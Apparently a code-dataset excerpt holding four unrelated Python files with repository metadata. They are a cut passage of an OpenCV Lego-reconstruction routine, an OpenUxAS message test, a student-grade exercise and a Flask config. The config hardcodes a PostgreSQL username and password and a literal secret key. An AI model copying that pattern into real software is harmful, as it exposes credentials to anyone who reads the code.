img_board_n5, img_board_n6 = img_board_ns
mask_lego = zc.get_mask(img_lego)
img_lego, borders = _lego_outof_board(mask_lego, img_board, rotation_mtx,
None)
img_lego_n0, borders = _lego_outof_board(mask_lego, img_board_n0,
rotation_mtx, borders)
img_lego_n1, borders = _lego_outof_board(mask_lego, img_board_n1,
rotation_mtx, borders)
img_lego_n2, borders = _lego_outof_board(mask_lego, img_board_n2,
rotation_mtx, borders)
img_lego_n3, borders = _lego_outof_board(mask_lego, img_board_n3,
rotation_mtx, borders)
img_lego_n4, borders = _lego_outof_board(mask_lego, img_board_n4,
rotation_mtx, borders)
img_lego_n5, borders = _lego_outof_board(mask_lego, img_board_n5,
rotation_mtx, borders)
img_lego_n6, borders = _lego_outof_board(mask_lego, img_board_n6,
rotation_mtx, borders)
# zc.check_and_display('lego_cropped', img_lego, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_scale=config.DISPLAY_SCALE,
# save_image=config.SAVE_IMAGE)
## detect colors: green, red, yellow, blue
mask_green, mask_red, mask_yellow, mask_blue = detect_colors(img_lego, None,
on_surface=True)
mask_green_n1, mask_red_n1, mask_yellow_n1, mask_blue_n1 = detect_colors(
img_lego_n1, None, on_surface=True)
mask_green_n3, mask_red_n3, mask_yellow_n3, mask_blue_n3 = detect_colors(
img_lego_n3, None, on_surface=True)
mask_green_on = zc.super_bitwise_and(
(mask_green[1], mask_green_n1[1], mask_green_n3[1]))
mask_yellow_on = zc.super_bitwise_and(
(mask_yellow[1], mask_yellow_n1[1], mask_yellow_n3[1]))
mask_red_on = zc.super_bitwise_and(
(mask_red[1], mask_red_n1[1], mask_red_n3[1]))
mask_blue_on = zc.super_bitwise_and(
(mask_blue[1], mask_blue_n1[1], mask_blue_n3[1]))
mask_green_all = zc.super_bitwise_and(
(mask_green[0], mask_green_n1[0], mask_green_n3[0]))
mask_yellow_all = zc.super_bitwise_and(
(mask_yellow[0], mask_yellow_n1[0], mask_yellow_n3[0]))
mask_red_all = zc.super_bitwise_and(
(mask_red[0], mask_red_n1[0], mask_red_n3[0]))
mask_blue_all = zc.super_bitwise_and(
(mask_blue[0], mask_blue_n1[0], mask_blue_n3[0]))
mask_colors = zc.super_bitwise_or(
(mask_green_all, mask_yellow_all, mask_red_all, mask_blue_all))
mask_colors_inv = cv2.bitwise_not(mask_colors)
## detect black and white
hsv_lego_dark = cv2.cvtColor(img_lego_n4, cv2.COLOR_BGR2HSV)
hsv_lego_bright = cv2.cvtColor(img_lego_n3, cv2.COLOR_BGR2HSV)
# special mask for black
# mask_black = detect_color((hsv_lego_dark, hsv_lego_bright), 'black')
mask1_1 = SimpleHSVColor(low_bound=HSVValue(0, 0, 0),
high_bound=HSVValue(359, 100, 20))
mask1_2 = SimpleHSVColor(low_bound=HSVValue(0, 0, 0),
high_bound=HSVValue(359, 25, 100))
mask2_1 = SimpleHSVColor(low_bound=HSVValue(0, 0, 0),
high_bound=HSVValue(359, 100, 45))
mask2_2 = SimpleHSVColor(low_bound=HSVValue(0, 0, 0),
high_bound=HSVValue(359, 40, 100))
mask1 = cv2.bitwise_and(mask1_1.get_mask(hsv_lego_dark),
mask1_2.get_mask(hsv_lego_bright))
mask2 = cv2.bitwise_and(mask2_1.get_mask(hsv_lego_dark),
mask2_2.get_mask(hsv_lego_bright))
mask_black = cv2.bitwise_or(mask1, mask2)
hsv_lego = cv2.cvtColor(img_lego_n6, cv2.COLOR_BGR2HSV)
# mask_white = detect_color(hsv_lego, 'white')
mask_white = LEGOColorWhite.get_mask(hsv_lego)
mask_black = cv2.bitwise_and(mask_black, mask_colors_inv)
mask_white = cv2.bitwise_and(mask_white, mask_colors_inv)
white, green, red, yellow, blue, black = zc.mask2bool((mask_white,
mask_green_on,
mask_red_on,
mask_yellow_on,
mask_blue_on,
mask_black))
nothing = np.bitwise_and(
np.bitwise_and(img_lego[:, :, 0] == 0, img_lego[:, :, 1] == 0),
img_lego[:, :, 2] == 0)
black = np.bitwise_and(black, np.invert(nothing))
unsure = np.invert(
zc.super_bitwise_or((nothing, white, green, red, yellow, blue, black)))
## calculate cumulative sum for color pixels to speed up sum operation
nothing_cumsum = zc.calc_cumsum(nothing)
white_cumsum = zc.calc_cumsum(white)
green_cumsum = zc.calc_cumsum(green)
yellow_cumsum = zc.calc_cumsum(yellow)
red_cumsum = zc.calc_cumsum(red)
blue_cumsum = zc.calc_cumsum(blue)
black_cumsum = zc.calc_cumsum(black)
unsure_cumsum = zc.calc_cumsum(unsure)
color_cumsums = {'nothing': nothing_cumsum,
'white' : white_cumsum,
'green' : green_cumsum,
'yellow' : yellow_cumsum,
'red' : red_cumsum,
'blue' : blue_cumsum,
'black' : black_cumsum,
'unsure' : unsure_cumsum
}
# generate an image with each pixel as its assigned color, for debug purpose
lego_color = None
if 'lego_color' in display_list:
color_labels = np.zeros(nothing.shape, dtype=np.uint8)
color_labels[white] = 1
color_labels[green] = 2
color_labels[yellow] = 3
color_labels[red] = 4
color_labels[blue] = 5
color_labels[black] = 6
color_labels[unsure] = 7
lego_color = bm.bitmap2syn_img(color_labels)
# zc.check_and_display('lego_color', lego_color, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_scale=config.DISPLAY_SCALE,
# save_image=config.SAVE_IMAGE)
## real stuff begins...
height, width, _ = img_lego.shape
# print "Expected rows and cols: %f, %f" % (height / config.BRICK_HEIGHT,
# width / config.BRICK_WIDTH)
# calculate candidate number of rows and columns for the Lego model,
# which is purely based on the pixel numbers
n_rows_opt = max(int((height / config.BRICK_HEIGHT) + 0.5), 1)
n_cols_opt = max(int((width / config.BRICK_WIDTH) + 0.3), 1)
best_ratio = 0
best_bitmap = None
best_plot = None
# best_offset = None
# the real number of rows and columns may be slightly different, but we
# don't consider it now...
for n_rows in range(n_rows_opt - 0, n_rows_opt + 1):
for n_cols in range(n_cols_opt - 0, n_cols_opt + 1):
bitmap, ratio, img_plot, _ = _img2bitmap(img_lego, color_cumsums,
n_rows, n_cols, lego_color)
if bitmap is None:
continue
# print "Reconstruction confidence: %f" % ratio
if ratio > best_ratio:
best_ratio = ratio
best_bitmap = bitmap
best_plot = img_plot
if best_bitmap is None \
or best_ratio < config.BRICK_MIN_BM_RATIO \
or best_bitmap.shape != (n_rows_opt, n_cols_opt):
raise LowConfidenceError('Not confident about reconstruction, '
'maybe too much noise. '
f'Best ratio: {best_ratio}')
# zc.check_and_display('plot_line', best_plot, display_list,
# wait_time=config.DISPLAY_WAIT_TIME,
# resize_scale=config.DISPLAY_SCALE,
# save_image=config.SAVE_IMAGE)
return best_bitmap
def process(img, stretch_ratio, display_list):
objects = _find_lego(img, stretch_ratio, display_list)
img_lego, img_lego_full, img_board, img_board_ns, perspective_mtx = \
objects
objects = _correct_orientation(img_lego, img_lego_full,
display_list)
img_lego_correct, img_lego_full_correct, rotation_mtx = objects
return _reconstruct_lego(img_lego, img_board, img_board_ns,
rotation_mtx, display_list)
| 45.779944
| 95
| 0.558637
|
872ebf6389b2ee1bfbe7c69fb243d2713fc20463
| 2,459
|
py
|
Python
|
tests/cpp/tests/arv/timeout_automation_response/test.py
|
VVCAS-Sean/OpenUxAS
|
dcd7be29d182d278a5387908f568d6f8a06b79ee
|
[
"NASA-1.3"
] | 88
|
2017-08-24T07:02:01.000Z
|
2022-03-18T04:34:17.000Z
|
tests/cpp/tests/arv/timeout_automation_response/test.py
|
VVCAS-Sean/OpenUxAS
|
dcd7be29d182d278a5387908f568d6f8a06b79ee
|
[
"NASA-1.3"
] | 46
|
2017-06-08T18:18:08.000Z
|
2022-03-15T18:24:43.000Z
|
tests/cpp/tests/arv/timeout_automation_response/test.py
|
VVCAS-Sean/OpenUxAS
|
dcd7be29d182d278a5387908f568d6f8a06b79ee
|
[
"NASA-1.3"
] | 53
|
2017-06-22T14:48:05.000Z
|
2022-02-15T16:59:38.000Z
|
import time
from pylmcp import Object
from pylmcp.server import Server
from pylmcp.uxas import AutomationRequestValidator, UxASConfig
# Create bridge configuration
bridge_cfg = UxASConfig()
bridge_cfg += AutomationRequestValidator()
with Server(bridge_cfg=bridge_cfg) as server:
try:
# Send messages
for obj in (Object(class_name='AirVehicleConfiguration', ID=400,
randomize=True),
Object(class_name='AirVehicleConfiguration', ID=500,
randomize=True),
Object(class_name='AirVehicleState', ID=400,
randomize=True),
Object(class_name='AirVehicleState', ID=500,
randomize=True),
Object(class_name='KeepInZone', ZoneID=1,
randomize=True),
Object(class_name='KeepOutZone', ZoneID=2,
randomize=True),
Object(class_name='OperatingRegion', ID=3,
KeepInAreas=[1], KeepOutAreas=[2]),
Object(class_name='cmasi.LineSearchTask', TaskID=1000,
randomize=True),
Object(class_name='TaskInitialized', TaskID=1000,
randomize=True),
Object(class_name='cmasi.AutomationRequest',
TaskList=[1000], EntityList=[400, 500],
OperatingRegion=3, randomize=True)):
server.send_msg(obj)
time.sleep(0.1)
msg = server.wait_for_msg(
descriptor='uxas.messages.task.UniqueAutomationRequest',
timeout=10.0)
assert(msg.descriptor == "uxas.messages.task.UniqueAutomationRequest")
assert(msg.obj['OriginalRequest'] == obj),\
"%s\nvs\n%s" % \
(msg.obj.as_dict()['OriginalRequest'], obj.as_dict())
msg = server.wait_for_msg(descriptor="afrl.cmasi.AutomationResponse",
timeout=20.0)
assert (msg.descriptor == "afrl.cmasi.AutomationResponse")
assert (msg.obj['VehicleCommandList'] == []), \
"%s\nvs\n%s" % (msg.obj.as_dict()['VehicleCommandList'], [])
assert (msg.obj['MissionCommandList'] == []), \
"%s\nvs\n%s" % (msg.obj.as_dict()['MissionCommandList'], [])
print("OK")
finally:
print("Here")
| 44.709091
| 78
| 0.544937
|
30875767884fabae94b15daed1f341ec4cf7cbc5
| 720
|
py
|
Python
|
13 - Lists II/Ex_89.py
|
o-Ian/Practice-Python
|
1e4b2d0788e70006096a53a7cf038db3148ba4b7
|
[
"MIT"
] | 4
|
2021-04-23T18:07:58.000Z
|
2021-05-12T11:38:14.000Z
|
13 - Lists II/Ex_89.py
|
o-Ian/Practice-Python
|
1e4b2d0788e70006096a53a7cf038db3148ba4b7
|
[
"MIT"
] | null | null | null |
13 - Lists II/Ex_89.py
|
o-Ian/Practice-Python
|
1e4b2d0788e70006096a53a7cf038db3148ba4b7
|
[
"MIT"
] | null | null | null |
dados = []
lista = []
n = 0
while True:
dados.append(input('Nome: '))
dados.append(float(input('Nota 1: ')))
dados.append(float(input('Nota 2: ')))
lista.append(dados[:])
dados.clear()
resp = input('Quer continuar? [S/N]: ')
if resp in 'Nn':
break
print('=-' * 30)
print('No Nome MÉDIA')
print('-' * 30)
for n, p in enumerate(lista):
print(f'{n:<5}{p[0]:15}{(p[1] + p[2]) / 2:>8}')
print('-' * 35)
while True:
nota_aluno = int(input('Mostrar a nota de qual aluno? [999 interrompe]: '))
if nota_aluno == 999:
break
print('-' * 35)
print(f'As notas de \033[1m{lista[nota_aluno][0]}\033[m são {lista[nota_aluno][1::]}')
print('-' * 35)
| 24.827586
| 90
| 0.541667
|
dcd114c8553418d31eedc9ff97bb5e068c810dc9
| 907
|
py
|
Python
|
config.py
|
Bryan4real/MyBlog
|
afab82c6dd0e3cbd39b193d97912be7ef3e1bf60
|
[
"Unlicense"
] | null | null | null |
config.py
|
Bryan4real/MyBlog
|
afab82c6dd0e3cbd39b193d97912be7ef3e1bf60
|
[
"Unlicense"
] | null | null | null |
config.py
|
Bryan4real/MyBlog
|
afab82c6dd0e3cbd39b193d97912be7ef3e1bf60
|
[
"Unlicense"
] | 1
|
2020-05-11T19:32:41.000Z
|
2020-05-11T19:32:41.000Z
|
import os
class Config:
'''
Parent configuration class
'''
debug = True
SECRET_KEY = os.environ.get('SECRET_KEY')
SQLALCHEMY_DATABASE_URI = 'postgresql+psycopg2://bryan:Admin@localhost/blog'
# email configurations
MAIL_SERVER = 'smtp.gmail.com'
MAIL_PORT = 465
MAIL_USE_TLS = False
MAIL_USE_SSL = True
MAIL_USERNAME = os.environ.get("MAIL_USERNAME")
MAIL_PASSWORD = os.environ.get("MAIL_PASSWORD")
class ProdConfig(Config):
'''
Production configuration child class
'''
SQLALCHEMY_DATABASE_URI = os.environ.get("DATABASE_URL")
class DevConfig(Config):
'''
Development configuration child class
'''
SECRET_KEY = 'niMIMI'
SQLALCHEMY_DATABASE_URI = 'postgresql+psycopg2://bryan:Admin@localhost/blog'
DEBUG = True
ENV = 'development'
config_options = {
'development':DevConfig,
'production':ProdConfig,
}
| 25.914286
| 80
| 0.68688
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.